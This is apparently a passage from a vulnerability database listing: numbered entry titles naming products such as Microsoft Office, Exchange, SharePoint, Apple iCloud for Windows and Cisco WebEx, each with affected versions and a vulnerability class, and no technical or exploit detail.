Skype for Business Server 2019 CU2 privilege escalation [146922] Microsoft Authentication Library up to 0.3.1-Alpha on Android information disclosure [146920] Microsoft Visual Studio 2019 Redirect [146866] Microsoft Office up to 2019 Excel information disclosure [146865] Microsoft Office up to 2019 Access information disclosure [146864] Microsoft Office up to 2019 PowerPoint privilege escalation [146863] Microsoft Office up to 2019 Word privilege escalation [146861] Microsoft Office up to 2019 Access information disclosure [146860] Microsoft Power BI Report Server cross site scripting [146853] Lenovo Energy Management Driver up to 15.11 on Windows 10 privilege escalation [146803] Microsoft Visual Studio 2008 Express XML External Entity [146800] Microsoft Excel XML Import XML External Entity [146332] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [146331] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [145418] Microsoft Office 2016/2019 on Mac Excel privilege escalation [145401] Microsoft Office 365 ProPlus/2019 ClickToRun Security Feature privilege escalation [145400] Microsoft Office up to 2019 Excel memory corruption [145399] Microsoft Office Online Server privilege escalation [145398] Microsoft Office up to 2019 Excel information disclosure [145397] Microsoft Office Online Server privilege escalation [145396] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Upload privilege escalation [145395] Microsoft SharePoint Server 2019 Security Feature privilege escalation [145385] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.3 Archive privilege escalation [145368] Microsoft Office up to 2019 information disclosure [145347] Microsoft Azure Stack User Portal weak authentication [145343] Microsoft Exchange Server 2013 CU23/2016 CU13/2016 CU14/2019 CU2/2019 CU3 Metadata privilege escalation [144649] Apple iCloud up to 10.7 on Windows WebKit Process Model memory corruption [144648] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144647] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144646] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144645] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144644] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144643] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144642] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144641] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144640] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144639] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144638] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144637] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144636] Apple iCloud up to 10.7 on Windows WebKit Universal cross site scripting [144635] Apple iCloud up to 10.7 on Windows libxslt memory corruption [144633] Apple iCloud up to 7.14 on Windows WebKit Process Model memory corruption [144632] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144631] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144630] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144629] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144628] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144627] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144626] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144625] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144624] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144412] PostgreSQL up to 9.4.23/9.5.18/9.6.14/10.9/11.4 on Windows Installer privilege escalation [143123] Microsoft SQL Server Management Studio 18.3.1 Permission privilege escalation [143095] Microsoft Excel up to 2019 for Mac memory corruption [143094] Microsoft SharePoint Foundation Impersonation privilege escalation [143093] Microsoft cross site scripting [143092] Microsoft cross site scripting [143091] Microsoft Excel up to 2019 for Mac memory corruption [143078] Microsoft SQL Server Management Studio 18.3/18.3.1 Permission privilege escalation [143074] Microsoft cross site scripting [143070] Microsoft Azure App Service Sandbox memory corruption [141639] Microsoft SharePoint Foundation 2013 SP1 cross site request forgery [141638] Microsoft Team Foundation Server/Azure DevOps Server cross site scripting [141633] Microsoft Excel up to 2019 memory corruption [141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation [141612] Microsoft Yammer on Android Security Feature Policy privilege escalation [141611] Microsoft Office up to 2019 Security Feature privilege escalation [141610] Microsoft Excel up to 2019 information disclosure [141609] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [141608] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site request forgery [141607] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [141589] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 memory corruption [141583] Microsoft Lync Server 2013 Conference information disclosure [141582] Microsoft .NET Framework up to 4.8 Common Language Runtime privilege escalation [141576] Microsoft Team Foundation Server/Azure DevOps Server privilege escalation [141566] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 API privilege escalation [141565] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 API privilege escalation [141564] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 Markup privilege escalation [141382] LibreOffice up to 6.2.6/6.3.2 on Windows LibreLogo privilege escalation [141274] Cisco Webex Teams Client on Windows privilege escalation [141188] MongoDB up to 3.4.21/3.6.13/4.0.10 on Windows OpenSSL privilege escalation [140144] Tenable Nessus up to 8.5.2 on Windows privilege escalation [140066] Microsoft NuGet/ADAL.NET Azure Active Directory privilege escalation [139961] Microsoft Outlook on iOS Email privilege escalation [139957] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [139956] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Session Object information disclosure [139929] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [139904] Microsoft Word 365 ProPlus/2016/2019 memory corruption [139903] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 privilege escalation [139902] Microsoft Word up to 2019 memory corruption [139901] Microsoft Outlook up to 2019 memory corruption [139877] Microsoft Outlook up to 2019 memory corruption [139664] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139663] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139662] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139661] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139660] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139659] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139587] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [139586] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [138937] Microsoft Outlook on Android Message Parser privilege escalation [138718] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138717] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138716] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138715] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138714] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138713] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138712] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138711] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138710] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138709] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138708] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138707] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138706] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138705] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138704] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138703] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138702] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138701] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138700] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138699] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138698] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138697] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal information disclosure [138696] Apple iCloud up to 7.12/10.5 on Windows libxslt privilege escalation [137589] Microsoft Exchange Server 2013 CU23/2016 CU12/2016 CU13/2019 CU1/2019 CU2 cross site scripting [137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation [137587] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [137572] Microsoft Excel 365 ProPlus/2019 information disclosure [137571] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137570] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137569] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 JavaScript privilege escalation [137551] Microsoft Exchange Server Display Name Invisible information disclosure [137550] Microsoft .NET Framework up to 4.8 Common Object Runtime Library Data Processing Error [137548] Microsoft Visual Studio XML Data information disclosure [137547] Microsoft Visual Studio File Permission privilege escalation [137546] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [137542] Microsoft SQL Server 2014 SP2/2016 SP1/2017 privilege escalation [137536] Microsoft Azure Automation privilege escalation [137526] Microsoft Azure DevOps Server/Team Foundation Server File privilege escalation [137522] Microsoft .NET Framework up to 4.8 WCF/WIF SAML Token Impersonation weak authentication [137521] Microsoft .NET Framework up to 4.8 Source Markup privilege escalation [136414] Microsoft Azure DevOps Server 2019 cross site request forgery [136333] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136332] Microsoft Office 365 ProPlus/2016/2019 Word memory corruption [136331] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [136330] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136329] Microsoft SharePoint Server 2016/2019 cross site scripting [136328] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136327] Microsoft Lync Server 2010/2013 privilege escalation [136294] Microsoft IIS Request Filter Data Processing Error [135806] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135805] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135804] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135803] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135802] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135801] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135800] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135799] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135798] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135797] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135796] Apple iCloud up to 7.11 on Windows WebKit privilege escalation [135795] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135794] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135793] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135792] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135791] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135790] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135789] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135788] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135787] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135786] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135785] Apple iCloud up to 7.11 on Windows SQLite memory corruption [135784] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135783] Apple iCloud up to 7.11 on Windows SQLite sql injection [135782] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135307] Citrix Workspace App on Windows Access Control privilege escalation [134754] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [134753] Microsoft Dynamics 365/Dynamics CRM Attachment 7PK Security Features [134752] Microsoft Azure Active Directory Connect 1.3.20.0 PowerShell privilege escalation [134749] Microsoft .NET Framework/.NET Core Data Processing Error [134748] Microsoft .NET Framework/.NET Core Data Processing Error [134747] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134745] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [134743] Microsoft SharePoint Server 2013 SP1/2016 privilege escalation [134742] Microsoft SharePoint Enterprise Server 2016/2019 privilege escalation [134741] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [134740] Microsoft SharePoint Enterprise Server 2013 SP1/2016 7PK Security Features [134739] Microsoft SharePoint Foundation 2010 SP2/2013 SP2 privilege escalation [134738] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134737] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134736] Microsoft Office 2010 SP2 Access Connectivity Engine Data Processing Error [134735] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134734] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134730] Microsoft Skype 8.35 on Android Bluetooth Listening information disclosure [134708] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134707] Microsoft .NET Framework up to 4.8 memory corruption [134705] Microsoft .NET Framework/.NET Core Regex privilege escalation [134704] Microsoft SQL Server 2017 Analysis Services information disclosure [134697] Microsoft Office/Word 365 ProPlus/2016/2019 memory corruption [134672] Facebook WhatsApp Messenger on Android/iOS/Windows Phone/Tizen VoIP Stack memory corruption [134594] Google Go up to 1.12.5 on Windows Process privilege escalation [133645] Oracle Java SE 8u202 Windows DLL privilege escalation [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE privilege escalation [133235] Microsoft Azure DevOps Server 2019 privilege escalation [133232] Microsoft Azure DevOps Server 2019 cross site scripting [133231] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133230] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133229] Microsoft Azure DevOps Server 2019 privilege escalation [133228] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133227] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133226] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation [133223] Microsoft Azure DevOps Server 2019 Content Security Policy privilege escalation [133206] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [133205] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [133204] Microsoft Office/Excel up to 2019 memory corruption [133203] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133202] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133201] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133200] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133199] Microsoft Office 2010 SP2 Access Connectivity Engine privilege escalation [133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error [133184] Microsoft Office 365 ProPlus/2016 for Mac/2019 Graphics Component memory corruption [133181] Microsoft Office/Excel/PowerPoint up to 2019 URL Data Processing Error [133142] Microsoft Azure Linux Guest Agent Swap File information disclosure [132958] Apple iCloud up to 7.6 on Windows memory corruption [132948] Apple iCloud up to 7.6 on Windows denial of service [132943] Apple iCloud up to 7.6 on Windows memory corruption [132939] Apple iCloud up to 7.6 on Windows memory corruption [132934] Apple iCloud up to 7.6 on Windows memory corruption [132928] Apple iCloud up to 7.6 on Windows memory corruption [132923] Apple iCloud up to 7.6 on Windows URL cross site scripting [132902] Apple iCloud up to 7.6 on Windows memory corruption [132898] Apple iCloud up to 7.6 on Windows memory corruption [132892] Apple iCloud up to 7.6 on Windows IFRAME 7PK Security Features [132888] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132884] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132880] Apple iCloud up to 7.6 on Windows State Management memory corruption [132876] Apple iCloud up to 7.6 on Windows memory corruption [132872] Apple iCloud up to 7.6 on Windows memory corruption [132866] Apple iCloud up to 7.6 on Windows memory corruption [132862] Apple iCloud up to 7.6 on Windows information disclosure [132858] Apple iCloud up to 7.6 on Windows URL cross site scripting [132853] Apple iCloud up to 7.6 on Windows memory corruption [132847] Apple iCloud up to 7.6 on Windows memory corruption [132842] Apple iCloud up to 7.6 on Windows memory corruption [132838] Apple iCloud up to 7.6 on Windows memory corruption [132833] Apple iCloud up to 7.3 on Windows memory corruption [132416] Apple iCloud up to 7.10 on Windows WebKit Universal cross site scripting [132415] Apple iCloud up to 7.10 on Windows WebKit Memory privilege escalation [132414] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132413] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132412] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132411] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132410] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132409] Apple iCloud up to 7.10 on Windows WebKit information disclosure [132408] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132407] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132406] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132405] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132404] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132403] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132402] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132401] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132400] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132398] Apple iCloud up to 7.10 on Windows CoreCrypto memory corruption [131687] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 3.2/2018 Updated 1.2 cross site scripting [131684] Microsoft Visual Studio 2017 Version 15.9 C++ Redistributable Installer privilege escalation [131682] Microsoft Lync Server/Skype for Business privilege escalation [131675] Microsoft SharePoint 2013 SP1/2016 cross site scripting [131662] Microsoft Visual Studio on Mac Package Manager privilege escalation [131656] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [131529] Google Go up to 1.12 on Windows DLL Loader LoadLibrary privilege escalation [131334] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131333] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131332] Microsoft Java SDK for Azure IoT Log information disclosure [131331] Microsoft Java SDK for Azure IoT Key Generation weak encryption [131330] Microsoft Exchange Server 2010 SP3 UR26/2013 CU22/2016 CU12/2019 CU1 privilege escalation [131329] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [130951] FeiFeiCms 4.0.181010 on Windows index.php directory traversal [130832] Microsoft 2013 SP1 privilege escalation [130829] Microsoft Visual Studio Code privilege escalation [130828] Microsoft Exchange Server 2010 SP3/2013 CU22/2016 CU12/2019 CU1 EWS privilege escalation [130826] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [130825] Microsoft Office up to 2019 Connectivity Engine memory corruption [130824] Microsoft Office up to 2019 Connectivity Engine memory corruption [130823] Microsoft Office up to 2019 Connectivity Engine memory corruption [130822] Microsoft Office up to 2019 Connectivity Engine memory corruption [130821] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [130815] Microsoft .NET Framework up to 4.7.2 URL privilege escalation [130795] Microsoft .NET Framework up to 4.7.2 Source Markup memory corruption [130785] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Security Feature Phishing 7PK Security Features [130777] Microsoft SharePoint Server Application Package privilege escalation [130351] idreamsoft iCMS 7.0.13 on Windows editor.admincp.php directory traversal [130220] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130219] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130218] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130217] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130216] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130097] Apple iCloud up to 7.9 on Windows WebKit Universal cross site scripting [130096] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130095] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130094] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130093] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130092] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130091] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130090] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130089] Apple iCloud up to 7.9 on Windows WebKit privilege escalation [130088] Apple iCloud up to 7.9 on Windows SQLite memory corruption [130087] Apple iCloud up to 7.9 on Windows SQLite sql injection [130086] Apple iCloud up to 7.9 on Windows SQLite memory corruption [129847] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 1.2/2018 Update 3.2 information disclosure [129846] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [129845] Microsoft Skype for Business 2015 CU 8 privilege escalation [129835] GE Voluson S8 Windows Operating System Patches privilege escalation [129133] Apple iCloud up to 7.3 on Windows privilege escalation [129128] Apple iCloud up to 7.3 on Windows Reachable Assertion [129119] Apple iCloud up to 7.3 on Windows privilege escalation [129114] Apple iCloud up to 7.3 on Windows privilege escalation [129109] Apple iCloud up to 7.3 on Windows privilege escalation [129104] Apple iCloud up to 7.4 on Windows information disclosure [129048] Apple iCloud up to 7.2 on Windows memory corruption [128765] Microsoft Visual Studio 2017 Version 15.9 C++ Construct memory corruption [128764] Microsoft Exchange Server 2010 SP3/2013 CU21/2016 CU10/2016 CU11/2019 PowerShell API information disclosure [128763] Microsoft Exchange Server 2016 CU10/2016 CU11/2019 memory corruption [128762] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 Word privilege escalation [128746] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [128745] Microsoft Office up to 2019 Word Macro information disclosure [128744] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128743] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [128741] Microsoft SharePoint Enterprise Server 2016 cross site scripting [128740] Microsoft SharePoint Enterprise Server 2013 SP1 cross site scripting [128734] Microsoft .NET Framework up to 4.7.2 CORS Filter information disclosure [128732] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 MSHTML Engine privilege escalation [128729] Microsoft Visual Studio 2010 SP1/2012 Update 5 vscontent File information disclosure [128605] WhatsApp Messenger up to 2.18 on Android/iOS/Windows Phone RTP Packet memory corruption [128112] Advantech WebAccess SCADA 8.3.2 on Windows 2008 privilege escalation [127991] IBM DB2 11.1 on Linux/Unix/Windows privilege escalation [127925] Microsoft SharePoint Enterprise Server 2016 cross site scripting [127883] Microsoft Azure Pack Rollup 13.1 cross site scripting [127825] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 privilege escalation [127824] Microsoft Excel up to 2019 information disclosure [127819] Microsoft Exchange Server 2016 CU10/2016 CU11 Profile Data Data Processing Error [127817] Microsoft Excel up to 2019 information disclosure [127814] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 Search information disclosure [127813] Microsoft .NET Framework up to 4.7.2 privilege escalation [127809] Microsoft PowerPoint 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [127806] Microsoft Outlook up to 2019 memory corruption [127805] Microsoft Excel up to 2019 memory corruption [127804] Microsoft Excel up to 2019 memory corruption [127800] Microsoft .NET Framework up to 4.7.2 privilege escalation [127634] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127633] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127632] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127631] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127630] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127629] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127628] Apple iCloud up to 7.8.1 on Windows Safari privilege escalation [127627] Apple iCloud up to 7.8.1 on Windows Safari Address privilege escalation [127609] Apple macOS up to 10.14.1 WindowServer memory corruption [127608] Apple macOS up to 10.14.1 WindowServer memory corruption [127436] HPE Intelligent Management Center up to 7.2 on Windows dbman.exe memory corruption [127047] PHP up to 7.1.24 on Windows com_safearray_proxy ext/standard/var.c denial of service [126938] Microsoft Team Foundation Server 2018 Update 1.1/2018 Update 3 privilege escalation [126794] Microsoft Team Foundation Server cross site scripting [126793] Microsoft Azure App Service on Azure Stack cross site scripting [126754] Microsoft Skype for Business/Lync Server 2013 SP1/2016 Emoji privilege escalation [126749] Microsoft Exchange Server 2010/2013/2016/2019 privilege escalation [126748] Microsoft Office 365 ProPlus/2019 Outlook Message information disclosure [126747] Microsoft SharePoint Enterprise Server 2013 SP1 Folder information disclosure [126746] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126745] Microsoft Project 2010 SP2/2013 SP1/2016 memory corruption [126744] Microsoft Office up to 2019 Word memory corruption [126743] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126734] Microsoft Office 365 ProPlus/2019 information disclosure [126728] Microsoft Office/SharePoint 2010 SP2 Word memory corruption [126727] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126726] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126717] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [126716] Microsoft Office up to 2019 Excel memory corruption [126715] Microsoft Office 365 ProPlus/2016/2019 Excel memory corruption [126620] PrestaShop up to 1.6.1.22/1.7.4.3 on Windows privilege escalation [126258] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126257] Apple iCloud up to 7.7 on Windows WebKit denial of service [126256] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126255] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126254] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126253] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126252] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126251] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126250] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126249] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126248] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126247] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126246] Apple iCloud up to 7.7 on Windows CoreCrypto Prime Number privilege escalation [125565] Oracle MySQL Server up to 8.0.12 Windows privilege escalation [125129] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XML Content XML External Entity [125127] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XMLA File XML External Entity [125126] Microsoft MQTT Object memory corruption [125124] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XEL File XML External Entity [125116] Microsoft Exchange Server 2013 CU21/2016 CU10 privilege escalation [125107] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [125105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125104] Microsoft SharePoint Enterprise Server 2016 privilege escalation [125102] Microsoft Office/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125100] Microsoft Office/PowerPoint 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125099] Microsoft Office/Excel up to 2019 Protected View Data Processing Error [125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation [124933] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124924] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124923] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124922] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124921] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124920] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124919] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124918] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124917] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124916] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124915] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124914] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124913] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124912] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124911] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124910] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124402] BigTree CMS 4.2.23 on Windows Rewrite Routing launch.php weak authentication [124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation [124064] Tor Browser up to 7.x on Windows Anonymity information disclosure [123995] Microsoft Lync 2011 on Mac Security Feature privilege escalation [123862] Microsoft SharePoint Enterprise Server 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [123861] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [123860] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [123859] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [123846] Microsoft Office 2016 on Win/Mac memory corruption [123844] Microsoft Word 2013 RT SP1/2013 SP1/2016 PDF File privilege escalation [123840] Microsoft .NET Framework up to 4.7.2 privilege escalation [123459] Docker up to 18.06.0ce-rc1 on Windows HandleRequestAsync privilege escalation [122887] Microsoft Office 2016 on Mac AutoUpdate privilege escalation [122875] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 